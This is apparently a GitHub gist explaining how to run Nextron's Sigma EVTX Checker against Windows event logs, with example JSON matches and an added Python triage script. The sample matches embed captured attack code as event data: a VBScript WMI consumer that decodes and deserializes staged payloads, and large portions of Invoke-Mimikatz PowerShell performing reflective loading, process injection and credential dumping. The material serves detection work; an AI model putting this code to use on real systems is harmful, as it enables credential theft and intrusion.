@Neo23x0
Last active January 5, 2023 15:24
Guide to Use Sigma EVTX Checker

Guide to Use Nextron's Sigma EVTX Checker

It's a fast Go-based scanner for Linux, Windows, and macOS that applies Sigma rules and outputs the matches as JSON.

Clone the Sigma Repository and cd into it

git clone https://github.com/SigmaHQ/sigma.git
cd sigma

Get the Sigma EVTX Checker

It's part of our EVTX repo in which we collect log exports for the Sigma CI pipeline tests.

The following command downloads the version for Linux:

wget https://github.com/NextronSystems/evtx-baseline/releases/latest/download/evtx-sigma-checker

Use evtx-sigma-checker-darwin for macOS and evtx-sigma-checker-win for the Windows version.

You can find the releases with the latest version for other operating systems here.

Run it on EVTX Files

Run the checker

  • with the log-source config of THOR (that's the config we use in our forensics scanner)
  • and all the Sigma rules in the ./rules/windows directory
  • and scan a directory which contains .evtx files

chmod +x evtx-sigma-checker
./evtx-sigma-checker --log-source ./tools/config/thor.yml --rule-path ./rules/windows/ --evtx-path $PATH_TO_YOUR_EVTX_FILES

Filter the Output

You can use the --rule-level flag to show only rules of a particular minimum level, e.g. --rule-level high. The default shows all matches of rules with level low and higher.

./evtx-sigma-checker --rule-level high --log-source ./tools/config/thor.yml --rule-path ./rules/windows/ --evtx-path $PATH_TO_YOUR_EVTX_FILES

The levels used in Sigma rules are:

  • informational
  • low
  • medium
  • high
  • critical

Beautify the Output

The checker prints its output as JSON to the terminal. For better readability, I recommend piping the output to jq.

  • on Linux: install it with sudo apt-get install jq
  • on macOS: install it with brew install jq
  • on Windows: download it from here

./evtx-sigma-checker --log-source ./tools/config/thor.yml --rule-path ./rules/windows/ --evtx-path $PATH_TO_YOUR_EVTX_FILES | jq .

Output

The output will look like this:

{
  "RulePath": "/Users/neo/code/Workspace/sigma/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml",
  "RuleTitle": "WMI Event Consumer Created Named Pipe",
  "RuleId": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb",
  "RuleLevel": "high",
  "MatchStrings": [
    {
      "SearchIdentifier": "selection",
      "Field": "Image",
      "Offset": 24,
      "Data": "\\scrcons.exe"
    }
  ],
  "Event": "RuleName: -  EventType: CreatePipe  UtcTime: 2021-09-01 11:51:50.206  ProcessGuid: 23F1E02A-693B-612F-AD00-000000006200  ProcessId: 5140  PipeName: \\WkSvcPipeMgr_BRYN78  Image: C:\\Windows\\system32\\wbem\\scrcons.exe  Provider_Name: Microsoft-Windows-Sysmon  Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9  EventID: 17  Version: 1  Level: 4  Task: 17  Opcode: 0  Keywords: 9223372036854775808  TimeCreated_SystemTime: 1.6304971102138944e+09  EventRecordID: 1889  Execution_ProcessID: 5528  Execution_ThreadID: 2020  Channel: Microsoft-Windows-Sysmon/Operational  Computer: dc01.isengard.local  Security_UserID: S-1-5-18  EventID: 17  ",
  "File": "evtx/sysmon-blacksmith.evtx",
  "Channel": "Microsoft-Windows-Sysmon/Operational"
}
{
  "RulePath": "/Users/neo/code/Workspace/sigma/rules/windows/wmi_event/sysmon_wmi_susp_encoded_scripts.yml",
  "RuleTitle": "Suspicious Encoded Scripts in a WMI Consumer",
  "RuleId": "83844185-1c5b-45bc-bcf3-b5bf3084ca5b",
  "RuleLevel": "high",
  "MatchStrings": [
    {
      "SearchIdentifier": "selection_destination",
      "Field": "Destination",
      "Offset": 16306,
      "Data": "V3JpdGVQcm9jZXNzTWVtb3J5"
    },
    {
      "SearchIdentifier": "selection_destination",
      "Field": "Destination",
      "Offset": 5552,
      "Data": "RoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2Rl"
    }
  ],
  "Event": "RuleName: -  EventType: WmiConsumerEvent  UtcTime: 2021-09-01 11:51:43.596  Operation: Deleted  User: ISENGARD\\Administrator  Name:  \"ScriptEventConsumer\"  Type: Script  Destination:  \"Function Base64ToStream(b,l)\r\\n  Dim enc, length, transform, ms\r\\n  Set enc = CreateObject(\\\"System.Text.ASCIIEncoding\\\")\r\\n  length = enc.GetByteCount_2(b)\r\\n  Set transform = CreateObject(\\\"System.Security.Cryptography.FromBase64Transform\\\")\r\\n  Set ms = CreateObject(\\\"System.IO.MemoryStream\\\")\r\\n  ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, l\r\\n  ms.Position = 0\r\\n  Set Base64ToStream = ms\r\\nEnd Function\r\\n\r\\nDim shell\r\\nSet shell = CreateObject(\\\"WScript.Shell\\\")\r\\nDim ver\r\\nver = \\\"v4.0.30319\\\"\r\\nOn Error Resume Next\r\\nshell.RegRead \\\"HKLM\\\\SOFTWARE\\\\\\\\Microsoft\\\\.NETFramework\\\\v4.0.30319\\\\\\\"\r\\nIf Err.Number <> 0 Then\r\\n  ver = \\\"v2.0.50727\\\"\r\\n  Err.Clear\r\\nEnd If\r\\nshell.Environment(\\\"Process\\\").Item(\\\"COMPLUS_Version\\\") = ver\r\\n\r\\nOn Error Resume Next\r\\n\r\\nDim stage_1, stage_2\r\\nstage_1 = \\\"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\\\"\r\\nstage_2 = \\\"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\\\"\r\\n\r\\nDim fmt_1\r\\nSet fmt_1 = CreateObject(\\\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\\\")\r\\nfmt_1.Deserialize_2(Base64ToStream(stage_1, 2341))\r\\n\r\\nIf Err.Number <> 0 Then\r\\n  Dim fmt_2\r\\n  Set fmt_2 = CreateObject(\\\"System.Runtime.Serialization.Formatters.Binary.BinaryFormatter\\\")\r\\n  fmt_2.Deserialize_2(Base64ToStream(stage_2, 20104))\r\\nEnd If\r\\n\r\\n\r\\n\"  Provider_Name: Microsoft-Windows-Sysmon  Provider_Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9  EventID: 20  Version: 3  Level: 4  Task: 20  Opcode: 0  Keywords: 9223372036854775808  TimeCreated_SystemTime: 1.630497103601843e+09  EventRecordID: 1816  Execution_ProcessID: 5528  Execution_ThreadID: 3328  
Channel: Microsoft-Windows-Sysmon/Operational  Computer: dc01.isengard.local  Security_UserID: S-1-5-18  EventID: 20  ",
  "File": "evtx/sysmon-blacksmith.evtx",
  "Channel": "Microsoft-Windows-Sysmon/Operational"
}
{
  "RulePath": "/Users/neo/code/Workspace/sigma/rules/windows/builtin/win_alert_mimikatz_keywords.yml",
  "RuleTitle": "Mimikatz Use",
  "RuleId": "06d71506-7beb-4f22-8888-e2e5e2ca7fd8",
  "RuleLevel": "high",
  "MatchStrings": [
    {
      "SearchIdentifier": "keywords",
      "Field": "raw",
      "Offset": 8144,
      "Data": "sekurlsa::"
    }
  ],
  "Event": "MessageNumber: \u000b  MessageTotal: �  ScriptBlockText: nyways\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)\n\t\t\t\tif ($Success -eq $false)\n\t\t\t\t{\n\t\t\t\t\tWrite-Warning \"Unable to free library: $ImportDllPath. Continuing anyways.\" -WarningAction Continue\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\t$ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Call DllMain with process detach\n\t\tWrite-Verbose \"Calling dllmain so the DLL knows it is being unloaded\"\n\t\t$DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\t\t$DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n\t\t$DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\t\t\n\t\t$DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null\n\t\t\n\t\t\n\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\tif ($Success -eq $false)\n\t\t{\n\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. 
Continuing anyways.\" -WarningAction Continue\n\t\t}\n\t}\n\n\n\tFunction Main\n\t{\n\t\t$Win32Functions = Get-Win32Functions\n\t\t$Win32Types = Get-Win32Types\n\t\t$Win32Constants =  Get-Win32Constants\n\t\t\n\t\t$RemoteProcHandle = [IntPtr]::Zero\n\t\n\t\t#If a remote process to inject in to is specified, get a handle to it\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne \"\"))\n\t\t{\n\t\t\tThrow \"Can't supply a ProcId and ProcName, choose one or the other\"\n\t\t}\n\t\telseif ($ProcName -ne $null -and $ProcName -ne \"\")\n\t\t{\n\t\t\t$Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)\n\t\t\tif ($Processes.Count -eq 0)\n\t\t\t{\n\t\t\t\tThrow \"Can't find process $ProcName\"\n\t\t\t}\n\t\t\telseif ($Processes.Count -gt 1)\n\t\t\t{\n\t\t\t\t$ProcInfo = Get-Process | where { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId\n\t\t\t\tWrite-Output $ProcInfo\n\t\t\t\tThrow \"More than one instance of $ProcName found, please specify the process ID to inject in to.\"\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\t$ProcId = $Processes[0].ID\n\t\t\t}\n\t\t}\n\t\t\n\t\t#Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. 
Keeping it around just incase it is needed in the future.\n\t\t#If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege\n#\t\tif ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)\n#\t\t{\n#\t\t\tWrite-Verbose \"Getting SeDebugPrivilege\"\n#\t\t\tEnable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n#\t\t}\t\n\t\t\n\t\tif (($ProcId -ne $null) -and ($ProcId -ne 0))\n\t\t{\n\t\t\t$RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)\n\t\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t\t{\n\t\t\t\tThrow \"Couldn't obtain the handle for process ID: $ProcId\"\n\t\t\t}\n\t\t\t\n\t\t\tWrite-Verbose \"Got the handle for the remote process to inject in to\"\n\t\t}\n\t\t\n\n\t\t#Load the PE reflectively\n\t\tWrite-Verbose \"Calling Invoke-MemoryLoadLibrary\"\n\n        try\n        {\n            $Processors = Get-WmiObject -Class Win32_Processor\n        }\n        catch\n        {\n            throw ($_.Exception)\n        }\n\n        if ($Processors -is [array])\n        {\n            $Processor = $Processors[0]\n        } else {\n            $Processor = $Processors\n        }\n\n        if ( ( $Processor.AddressWidth) -ne (([System.IntPtr]::Size)*8) )\n        {\n            Write-Verbose ( \"Architecture: \" + $Processor.AddressWidth + \" Process: \" + ([System.IntPtr]::Size * 8))\n            Write-Error \"PowerShell architecture (32bit/64bit) doesn't match OS architecture. 
64bit PS must be used on a 64bit OS.\" -ErrorAction Stop\n        }\n\n        #Determine whether or not to use 32bit or 64bit bytes\n        if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8)\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64)\n        }\n        else\n        {\n            [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32)\n        }\n        $PEBytes[0] = 0\n        $PEBytes[1] = 0\n\t\t$PEHandle = [IntPtr]::Zero\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs\n\t\t}\n\t\telse\n\t\t{\n\t\t\t$PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle\n\t\t}\n\t\tif ($PELoadedInfo -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tThrow \"Unable to load PE, handle returned is NULL\"\n\t\t}\n\t\t\n\t\t$PEHandle = $PELoadedInfo[0]\n\t\t$RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process\n\t\t\n\t\t\n\t\t#Check if EXE or DLL. If EXE, the entry point was already called and we can now return. 
If DLL, call user function.\n\t\t$PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\t\tif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))\n\t\t{\n\t\t\t#########################################\n\t\t\t### YOUR CODE GOES HERE\n\t\t\t#########################################\n                    Write-Verbose \"Calling function with WString return type\"\n\t\t\t\t    [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"powershell_reflective_mimikatz\"\n\t\t\t\t    if ($WStringFuncAddr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t\t    Throw \"Couldn't find function address.\"\n\t\t\t\t    }\n\t\t\t\t    $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr])\n\t\t\t\t    $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)\n                    $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs)\n\t\t\t\t    [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput)\n                    [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput)\n\t\t\t\t    if ($OutputPtr -eq [IntPtr]::Zero)\n\t\t\t\t    {\n\t\t\t\t    \tThrow \"Unable to get output, Output Ptr is NULL\"\n\t\t\t\t    }\n\t\t\t\t    else\n\t\t\t\t    {\n\t\t\t\t        $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)\n\t\t\t\t        Write-Output $Output\n\t\t\t\t        $Win32Functions.LocalFree.Invoke($OutputPtr);\n\t\t\t\t    }\n\t\t\t#########################################\n\t\t\t### END OF YOUR CODE\n\t\t\t#########################################\n\t\t}\n\t\t#For remote DLL injection, call a void function which takes no parameters\n\t\telseif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n\t\t{\n\t\t\t$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n\t\t\tif 
(($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))\n\t\t\t{\n\t\t\t\tThrow \"VoidFunc couldn't be found in the DLL\"\n\t\t\t}\n\t\t\t\n\t\t\t$VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle\n\t\t\t$VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle\n\t\t\t\n\t\t\t#Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors\n\t\t\t$RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions\n\t\t}\n\t\t\n\t\t#Don't free a library if it is injected in a remote process\n\t\tif ($RemoteProcHandle -eq [IntPtr]::Zero)\n\t\t{\n\t\t\tInvoke-MemoryFreeLibrary -PEHandle $PEHandle\n\t\t}\n\t\telse\n\t\t{\n\t\t\t#Just delete the memory allocated in PowerShell to build the PE before injecting to remote process\n\t\t\t$Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n\t\t\tif ($Success -eq $false)\n\t\t\t{\n\t\t\t\tWrite-Warning \"Unable to call VirtualFree on the PE's memory. 
Continuing anyways.\" -WarningAction Continue\n\t\t\t}\n\t\t}\n\t\t\n\t\tWrite-Verbose \"Done!\"\n\t}\n\n\tMain\n}\n\n#Main function to either run the script locally or remotely\nFunction Main\n{\n\tif (($PSCmdlet.MyInvocation.BoundParameters[\"Debug\"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[\"Debug\"].IsPresent)\n\t{\n\t\t$DebugPreference  = \"Continue\"\n\t}\n\t\n\tWrite-Verbose \"PowerShell ProcessID: $PID\"\n\t\n\n\tif ($PsCmdlet.ParameterSetName -ieq \"DumpCreds\")\n\t{\n\t\t$ExeArgs = \"sekurlsa::logonpasswords exit\"\n\t}\n    elseif ($PsCmdlet.ParameterSetName -ieq \"DumpCerts\")\n    {\n        $ExeArgs = \"crypto::cng crypto::capi `\"crypto::certificates /export`\" `\"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`\" exit\"\n    }\n    else\n    {\n        $ExeArgs = $Command\n    }\n\n    [System.IO.Directory]::SetCurrentDirectory($pwd)\n\n    # 2.1 (x64) 20161029 OJ Edition!\n    # SHA256 hash: C36572664731F058A282FA6F943E48FE80646F6613C3A46F3EEE1F4A121B2158\n    # VirusTotal Analysis: https://www.virustotal.com/en/file/c36572664731f058a282fa6f943e48fe80646f6613c3a46f3eee1f4a121b2158/analysis/1478821040/\n    $PEBytes64 = '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  ScriptBlockId: 334734fa-3743-480e-8341-8c3c57da0950  Path: C:\\Users\\neo\\Downloads\\Invoke-Mimikatz.ps1  Provider_Name: Microsoft-Windows-PowerShell  Provider_Guid: A0C1853B-5C40-4B15-8766-3CF1C58F985A  EventID: 4104  Version: 1  Level: 3  Task: 2  Opcode: 15  Keywords: 0  TimeCreated_SystemTime: 1.5746709037001536e+09  EventRecordID: 650  Correlation_ActivityID: 7CA979B2-A06E-0000-9C73-AA7C6EA0D501  Execution_ProcessID: 8212  Execution_ThreadID: 1824  Channel: Microsoft-Windows-PowerShell/Operational  Computer: HYPERION  Security_UserID: S-1-5-21-1569579455-888006095-2183311757-1001  EventID: 4104  ",
  "File": "evtx/Win10-PowerShell.evtx",
  "Channel": "Microsoft-Windows-PowerShell/Operational"
}
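
For triaging output like the above, here is an added example (not part of the original gist or Nextron's code) that parses the stream of concatenated JSON objects and counts matches per rule and file, applying a minimum level in the order of the Sigma levels listed earlier. The sample records, rule titles and file names are constructed for illustration.

```python
import json
import sys
from collections import Counter

# Sigma levels in ascending severity, in the order the guide lists them.
LEVELS = ["informational", "low", "medium", "high", "critical"]

def iter_matches(text):
    """Yield each match object. The checker emits concatenated JSON objects,
    not one array, so a single json.loads() on the whole output would fail."""
    decoder = json.JSONDecoder()
    pos = 0
    while True:
        while pos < len(text) and text[pos].isspace():
            pos += 1  # skip whitespace between objects
        if pos >= len(text):
            return
        obj, pos = decoder.raw_decode(text, pos)
        yield obj

def summarize(text, min_level="low"):
    """Count matches per (level, rule title, file) at or above min_level,
    most severe first, then by number of hits."""
    floor = LEVELS.index(min_level)
    counts = Counter()
    for m in iter_matches(text):
        level = m.get("RuleLevel")
        if level in LEVELS and LEVELS.index(level) >= floor:
            counts[(level, m.get("RuleTitle", "?"), m.get("File", "?"))] += 1
    return sorted(counts.items(),
                  key=lambda kv: (-LEVELS.index(kv[0][0]), -kv[1], kv[0][1]))

# Constructed sample in the shape of the checker's output; all values invented.
SAMPLE = """
{"RuleTitle": "Example Rule A", "RuleLevel": "high",
 "MatchStrings": [{"SearchIdentifier": "selection", "Field": "Image", "Data": "example.exe"}],
 "File": "evtx/sample-a.evtx"}
{"RuleTitle": "Example Rule A", "RuleLevel": "high", "MatchStrings": [], "File": "evtx/sample-a.evtx"}
{"RuleTitle": "Example Rule B", "RuleLevel": "medium", "MatchStrings": [], "File": "evtx/sample-a.evtx"}
{"RuleTitle": "Example Rule C", "RuleLevel": "critical", "MatchStrings": [], "File": "evtx/sample-b.evtx"}
{"RuleTitle": "Example Rule D", "RuleLevel": "low", "MatchStrings": [], "File": "evtx/sample-b.evtx"}
"""

if __name__ == "__main__":
    # Reads checker output piped on stdin; falls back to the sample on a terminal.
    data = SAMPLE if sys.stdin.isatty() else sys.stdin.read()
    for (level, title, path), hits in summarize(data, "medium"):
        print(f"{level:<9}{hits:>4}  {title}  [{path}]")
```

Saved as a script (the name `triage.py` is an assumption), it can take the checker's output on stdin in place of `jq .`, which gives a per-rule overview before opening the full events.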